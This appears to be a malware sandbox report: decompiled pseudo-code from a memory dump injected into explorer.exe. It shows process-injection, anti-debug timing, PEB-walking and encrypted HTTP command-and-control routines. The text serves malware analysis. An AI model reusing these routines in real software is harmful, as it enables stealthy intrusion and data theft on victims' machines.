    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007713B4(void** __eax, long __edx) {
    				void** _v8;
    				long _v12;
    				void* _t7;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
    				 *_v8 = _t7;
    				return _t7;
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Non-executed Functions

    C-Code - Quality: 91%
    			E00775640(char* __eax, void* __ecx, void* __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				struct _WIN32_FIND_DATAA _v352;
    				char _v609;
    				char _v866;
    				intOrPtr _t68;
    				int _t81;
    				intOrPtr _t89;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				intOrPtr _t131;
    				void* _t133;
    				void* _t134;
    				void* _t135;
    
    				_v8 = __eax;
    				_v12 = 0;
    				 *_v8 = 0;
    				 *0x77b21c(0,  &_v609, 0x1a, 0xffffffff);
    				_t68 =  *0x77a188; // 0x771e60
    				E0077133C( &_v609, _t68);
    				_t135 = _t134 + 8;
    				_v352.dwFileAttributes = 0x80;
    				_v16 = FindFirstFileA( &_v609,  &_v352);
    				 *((char*)(_t133 + E007712DC( &_v609) - 0x25e)) = 0;
    				if(_v16 == 0xffffffff) {
    					L12:
    					FindClose(_v16);
    					return _v12;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					if(_v352.cFileName == 0x2e) {
    						goto L11;
    					}
    					E00771308( &_v866,  &_v609);
    					E0077133C( &_v866,  &(_v352.cFileName));
    					_t89 =  *0x77a178; // 0x771e20
    					E0077133C( &_v866, _t89);
    					_t135 = _t135 + 0x10;
    					if(E00773988( &_v866) == 0) {
    						goto L11;
    					}
    					_v24 = E007747AC( &_v866,  &_v20);
    					if(_v24 <= 0) {
    						goto L11;
    					}
    					 *((char*)(_v20 + _v24)) = 0;
    					_t127 =  *0x77a17c; // 0x771e2c
    					_v28 = E00771110(_v20, _t127);
    					if(_v28 == 0) {
    						E00771828(_v20);
    						goto L11;
    					}
    					_v28 = _v28 + 0xd;
    					if( *_v28 == 0x31) {
    						_t128 =  *0x77a180; // 0x771e3c
    						_v28 = E00771110(_v20, _t128);
    						if(_v28 != 0) {
    							_v28 = _v28 + 0xe;
    							_v32 = E00771110(_v28, E0077584C);
    							 *_v32 = 0;
    							E00771308(_v8, _v28);
    							 *_v32 = 0x22;
    							_t131 =  *0x77a184; // 0x771e4c
    							_v28 = E00771110(_v20, _t131);
    							if(_v28 != 0) {
    								_v28 = _v28 + 0x12;
    								_v32 = E00771110(_v28, 0x775850);
    								 *_v32 = 0;
    								E0077133C(_v8, 0x775854);
    								E0077133C(_v8, _v28);
    								_v12 = 0xffffffff;
    							}
    						}
    					}
    					E00771828(_v20);
    					goto L12;
    					L11:
    					_t81 = FindNextFileA(_v16,  &_v352);
    					asm("sbb eax, eax");
    				} while ( ~( ~_t81) != 0);
    				goto L12;
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00775664
    • FindFirstFileA.KERNEL32(?,00000080), ref: 00775697
      • Part of subcall function 00773988: FindFirstFileA.KERNEL32(?,?), ref: 007739A4
      • Part of subcall function 00773988: FindClose.KERNEL32(000000FF), ref: 007739BF
      • Part of subcall function 007747AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
      • Part of subcall function 007747AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
      • Part of subcall function 007747AC: GetFileSize.KERNEL32(?,00000000), ref: 00774810
      • Part of subcall function 007747AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
      • Part of subcall function 007747AC: CloseHandle.KERNEL32(?), ref: 00774849
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
    • FindNextFileA.KERNEL32(000000FF,00000080), ref: 00775825
    • FindClose.KERNEL32(000000FF), ref: 0077583D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00774DE0(void* __eax, void* __eflags) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				void _v20;
    				long _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v12 = 0;
    				E00771258( &_v52, 0x18);
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
    				if(_v16 == 0 && _v48 != 0) {
    					_v20 = _v48 + 8;
    					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
    					_v20 = _v28 + 0x3c;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v20 = _v20 + _v28 + 0x28;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v12 = _v20 + _v28;
    				}
    				return _v12;
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 72%
    			E00776DB0(void* __ecx, void* __fp0) {
    				signed char _v4;
    				intOrPtr _v8;
    				signed int _t9;
    				void* _t19;
    				signed int _t27;
    
    				_t19 = __ecx;
    				asm("sbb dl, [edi+0x421cd09]");
    				_t9 = 0x0000001c |  *0x1c;
    				_t27 = _t9;
    				if(_t27 >= 0) {
    					L4:
    					_t9 = 0x77;
    				} else {
    					if(_t27 > 0) {
    						asm("fisttp word [edx+0x8f9cbcc]");
    						GetTickCount();
    						goto L4;
    					}
    				}
    				 *((intOrPtr*)(_t19 - 0xb9707bb)) =  *((intOrPtr*)(_t19 - 0xb9707bb)) + _t19;
    				 *_t9 =  *_t9 + _t9;
    				asm("adc eax, 0x77b4c4");
    				_t11 = GetTickCount() - _v8;
    				asm("sbb eax, eax");
    				_v4 =  ~((GetTickCount() - _v8 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
    				return _v4;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 72%
    			E00776DC8(void* __ebx, void* __ecx) {
    				signed char _v8;
    				intOrPtr _v12;
    				void* _t18;
    
    				_t18 = __ecx;
    				GetTickCount();
    				 *((intOrPtr*)(_t18 - 0xb9707bb)) =  *((intOrPtr*)(_t18 - 0xb9707bb)) + _t18;
    				 *0x77 =  *0x77 + 0x77;
    				asm("adc eax, 0x77b4c4");
    				_t11 = GetTickCount() - _v12;
    				asm("sbb eax, eax");
    				_v8 =  ~((GetTickCount() - _v12 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
    				return _v8;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 98%
    			E00775D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				char _v168;
    				char _v184;
    				char _v200;
    				char _v204;
    				char _v269;
    				char _v285;
    				char _v301;
    				char _v317;
    				intOrPtr _v324;
    				intOrPtr _v328;
    				intOrPtr _v332;
    				char _v336;
    				char _v849;
    				intOrPtr _t239;
    				signed int _t250;
    				char _t255;
    				intOrPtr _t256;
    				intOrPtr _t257;
    				intOrPtr _t259;
    				signed int _t330;
    				intOrPtr _t436;
    				intOrPtr _t438;
    				void* _t470;
    
    				_v8 = 0;
    				if(_a16 == 0) {
    					L40:
    					return _v8;
    				}
    				_v64 = 0;
    				if(_a20 == 0) {
    					__eflags = 0;
    					_v28 = 0;
    					L9:
    					_v60 = E00771110(_a16, E0077633C);
    					_t474 = _v60;
    					if(_v60 == 0) {
    						goto L40;
    					}
    					_v32 = _v60 - _a16;
    					E007712B8( &_v269, _v32, _a16);
    					 *((char*)(_t470 + _v32 - 0x109)) = 0;
    					E00771308( &_v849, _v60);
    					E007754B8( &_v849, _v60, _t474);
    					E00775858( &_v301, 0x10);
    					E00775858( &_v317, 0x10);
    					E007712B8( &_v184, 0x10,  &_v301);
    					E007712B8( &_v200, 0x10,  &_v317);
    					_v204 = _a28;
    					if(_a12 != 0) {
    						E007712B8( &_v168, 0x51, _a12);
    					}
    					E007717E8( &_v48, 0, 0, 0xf0000000, 1);
    					E007718A0(_v48, 0x94, _a8,  &_v56, 0, 0);
    					_v32 = 0x75;
    					E00771AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
    					E00771AF8(_v56);
    					E00771B20(_v48, 0);
    					E00771268( &_v204, 0x80);
    					_t239 =  *0x77a1c0; // 0x771f00
    					_v12 = E00773864(_t239, _v28, _v64, 0, 0);
    					_v28 = 1;
    					E0077170C(_v12,  &_v28, 0x46, 4);
    					_v28 = 0x1770;
    					E0077170C(_v12,  &_v28, 2, 4);
    					_v28 = 0x1f40;
    					E0077170C(_v12,  &_v28, 6, 4);
    					E0077170C(_v12,  &_v28, 5, 4);
    					_v28 = 1;
    					_t250 = E0077170C(_v12,  &_v28, 0x4d, 4);
    					asm("sbb eax, eax");
    					if( ~( ~_t250) == 0) {
    						_v76 = 1;
    						_v72 = 0;
    						E0077170C(0,  &_v76, 0x32, 8);
    					}
    					if(_a4 == 0) {
    						_v28 = 0x50;
    					} else {
    						_v28 = 0x1bb;
    					}
    					_v16 = E0077161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
    					if(_a4 == 0) {
    						_v28 = 0x4600000;
    					} else {
    						_v28 = 0x4e03000;
    					}
    					_t255 =  *0x77a1c4; // 0x771f48
    					_v336 = _t255;
    					_t256 =  *0x77a1c8; // 0x771f54
    					_v332 = _t256;
    					_t257 =  *0x77a1cc; // 0x771f6c
    					_v328 = _t257;
    					_v324 = 0;
    					_t259 =  *0x77a23c; // 0x77209c
    					_t436 =  *0x77a1ac; // 0x771ed4
    					_v20 = E00771660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
    					if(_a4 != 0) {
    						_v32 = 4;
    						E007716D8(_v20,  &_v28, 0x1f,  &_v32);
    						_v28 = _v28 | 0x00000100;
    						E0077170C(_v20,  &_v28, 0x1f, 4);
    					}
    					_t482 = _a24;
    					if(_a24 == 0) {
    						_v68 = E007713DC(_v32 + 0x80);
    						_t397 = 0x80;
    						E007712B8(_v68, 0x80,  &_v204);
    						__eflags = 0;
    						_v32 = 0;
    					} else {
    						E00775894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
    						_v68 = E007713DC(_v32 + 0x80);
    						E007712B8(_v68, 0x80,  &_v204);
    						_t397 =  &_v301;
    						E00775894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
    					}
    					_t438 =  *0x77a1d0; // 0x771f70
    					if(E007715E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
    						E00771440(_v68);
    						_v32 = 4;
    						_v24 = 0;
    						_v28 = 0;
    						E007739CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
    						__eflags = _v24 - 0x12e;
    						if(_v24 != 0x12e) {
    							goto L39;
    						}
    						_v40 = E007713DC(0x1000);
    						__eflags = 0;
    						_v36 = 0;
    						while(1) {
    							_v44 = E007716A4(_v20, 0,  &_v32, 0);
    							asm("sbb eax, eax");
    							__eflags =  ~( ~_v44);
    							if( ~( ~_v44) == 0) {
    								goto L39;
    							}
    							__eflags = _v44;
    							if(_v44 == 0) {
    								continue;
    							}
    							__eflags = _v32;
    							if(_v32 == 0) {
    								__eflags = _v36 - 0x20;
    								if(_v36 >= 0x20) {
    									 *_a32 = E007713DC(_v36 + 1);
    									 *_a36 = _v36;
    									E007759BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
    									E007717E8( &_v48, 0, 0, 0xf0000000, 1);
    									E00771374(_v48, 0, 0x8003,  &_v52, 0);
    									E00771404(_v52, 0x10,  &_v301, 0);
    									E00771404(_v52, 0x10,  &_v317, 0);
    									E00771404(_v52, E007712DC( &_v269),  &_v269, 0);
    									E00771404(_v52,  *_a36,  *_a32, 0);
    									_v32 = 0x10;
    									E00771490(_v52,  &_v285, 2, 0,  &_v32);
    									E007714D0(_v52);
    									E00771B20(_v48, 0);
    									_t330 = E007711F8( &_v285, 0x10, _v40);
    									__eflags = _t330;
    									if(_t330 != 0) {
    										E00771440(_v40);
    										 *((char*)( *_a32 +  *_a36)) = 0;
    										_v8 = 0xffffffff;
    									} else {
    										E00771440(_v40);
    										E00771440( *_a32);
    										 *_a32 = 0;
    										 *_a36 = 0;
    									}
    								} else {
    									E00771440(_v40);
    								}
    								goto L39;
    							}
    							__eflags = _v36 + _v32 - 0x200000;
    							if(_v36 + _v32 > 0x200000) {
    								goto L39;
    							}
    							_v40 = E00771460(_v40, _v36 + _v32);
    							E007715B0(_v20, _v32, _v40 + _v36,  &_v32);
    							_v36 = _v36 + _v32;
    						}
    						goto L39;
    					} else {
    						E00771440(_v68);
    						L39:
    						E0077151C(_v20);
    						E0077151C(_v16);
    						E0077151C(_v12);
    						goto L40;
    					}
    				}
    				if( *_a20 != 1) {
    					__eflags =  *_a20 - 2;
    					if( *_a20 != 2) {
    						__eflags =  *_a20 - 3;
    						if( *_a20 != 3) {
    							goto L40;
    						}
    						_v28 = 3;
    						_v64 = _a20 + 4;
    						goto L9;
    					}
    					_v28 = 0;
    				} else {
    					_v28 = 1;
    				}
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00774E94(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				long _v20;
    				void* _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
    				if(_v16 == 0 && _v48 != 0) {
    					_v24 = _v48 + 8;
    					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20);
    					_v12 = _v28;
    				}
    				return _v12;
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00774EAD
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774EDD
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 84%
    			E00773988(CHAR* __eax) {
    				CHAR* _v8;
    				signed char _v12;
    				void* _v16;
    				struct _WIN32_FIND_DATAA _v336;
    				signed int _t16;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t16 = FindFirstFileA(_v8,  &_v336);
    				_v16 = _t16;
    				asm("sbb eax, eax");
    				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
    				FindClose(_v16);
    				return _v12;
    			}

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 007739A4
    • FindClose.KERNEL32(000000FF), ref: 007739BF
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00771AE5
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007717A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007717D5
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007718A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
    				long* _v8;
    				BYTE* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b500)) != 0xe9) {
    					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 007718D1
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007717A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007717D5
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007717E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
    				HCRYPTPROV* _v8;
    				char* _v12;
    				char* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b4fc)) != 0xe9) {
    					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
    				}
    				return _v20;
    			}

    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00771815
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 007714BD
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 007713A1
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0077142D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0077159D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E0077153C(long* __eax, BYTE* __ecx, int __edx) {
    				long* _v8;
    				int _v12;
    				BYTE* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b458)) != 0xe9) {
    					_v20 = CryptGenRandom(_v8, _v12, _v16);
    				}
    				return _v20;
    			}

    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00771561
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007715B0(void* __eax, long __ecx, void* __edx, DWORD* _a4) {
    				void* _v8;
    				void* _v12;
    				long _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = InternetReadFile(_v8, _v12, _v16, _a4);
    				return _v20;
    			}

    APIs
    • InternetReadFile.WININET(?,?,?,?), ref: 007715CF
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00771B20(long* __eax, int __edx) {
    				long* _v8;
    				int _v12;
    				int _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x77b50c)) != 0xe9) {
    					_v16 = CryptReleaseContext(_v8, _v12);
    				}
    				return _v16;
    			}

    APIs
    • CryptReleaseContext.ADVAPI32(?,?), ref: 00771B3E
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 007714E7
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00771AF8(long* __eax) {
    				long* _v8;
    				int _v12;
    
    				_v8 = __eax;
    				if( *((char*)( *0x77b508)) != 0xe9) {
    					_v12 = CryptDestroyKey(_v8);
    				}
    				return _v12;
    			}

    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 00771B0F
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 65%
    			E00776B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    
    				_v24 = __eax;
    				asm("rdtsc");
    				_v12 = __eax;
    				_v8 = __edx;
    				asm("cpuid");
    				asm("rdtsc");
    				_v20 = 0;
    				_v16 = __edx;
    				 *((intOrPtr*)(_v24 + 4)) = _v16;
    				 *_v24 = _v20;
    				return E00776A38(_v24,  &_v12);
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007724F8() {
    				intOrPtr _v8;
    				intOrPtr* _t10;
    
    				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
    				do {
    					_t10 =  *_t10;
    				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
    				_v8 =  *((intOrPtr*)(_t10 + 8));
    				return _v8;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 98%
    			E00775028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t144;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E007712DC(_a16) + 1;
    				}
    				E00771258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L22:
    					return _v8;
    				}
    				E00771164(E007710B4(_t109, 0x44),  &_v353);
    				E0077133C( &_v353, "_section");
    				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    				_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
    				_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
    				E007712B8(_v16, _v24, _a8);
    				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    				E007712B8(_v16 + _v24 + 8, _a20, _a16);
    				_v24 = 0x29b;
    				E007713B4( &_v28, _v24 + 0x11);
    				E007712B8(_v28, _v24, 0x77a2ac);
    				_t144 = _v24 - 1;
    				if(_t144 < 0) {
    					L9:
    					_v20 = E007712DC( &_v353) + 1;
    					E007712B8(_v28 + _v24, _v20,  &_v353);
    					_v24 = _v24 + _v20;
    					_v40 = 0;
    					_v40 = E00774EF0(_v332.ExtendedRegisters.hProcess, _t224);
    					if(_v40 == 0) {
    						E00771258( &_v332, 0xcc);
    						_v332.ContextFlags = 0x10007;
    						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    							_v40 = _v332.Eax;
    						}
    					}
    					_t228 = _v40;
    					if(_v40 == 0) {
    						_v40 = E00774DE0(_v332.ExtendedRegisters.hProcess, _t228);
    					}
    					if(_v40 != 0) {
    						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
    						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
    						E00771828(_v28);
    						ResumeThread(_v124);
    						if(_a24 == 0) {
    							__eflags = 0;
    							_v8 = 0;
    						} else {
    							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    								_v8 = 0xfffffffe;
    							} else {
    								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    							}
    						}
    						CloseHandle(_v124);
    						CloseHandle(_v332.ExtendedRegisters);
    					}
    					goto L22;
    				}
    				_v44 = _t144 + 1;
    				_v32 = 0;
    				do {
    					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    					_v32 = _v32 + 1;
    					_t55 =  &_v44;
    					 *_t55 = _v44 - 1;
    					_t224 =  *_t55;
    				} while ( *_t55 != 0);
    				goto L9;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00775040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D
      • Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
